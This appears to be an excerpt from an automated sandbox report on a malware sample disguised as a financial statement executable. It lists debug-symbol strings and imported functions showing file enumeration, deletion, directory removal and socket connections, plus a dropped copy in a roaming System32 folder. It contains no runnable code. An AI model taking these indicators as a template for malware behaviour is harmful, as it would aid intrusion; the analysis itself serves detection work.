          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb4 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbE source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb> source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbA source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00404C0A
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040751B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basi
c_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr7_2_00410586
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std
@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040728F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begi
n@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE7_2_0040477E
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00403325
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe | Code function: 7_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_00412BEE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEA
AV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00404C0A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040751B
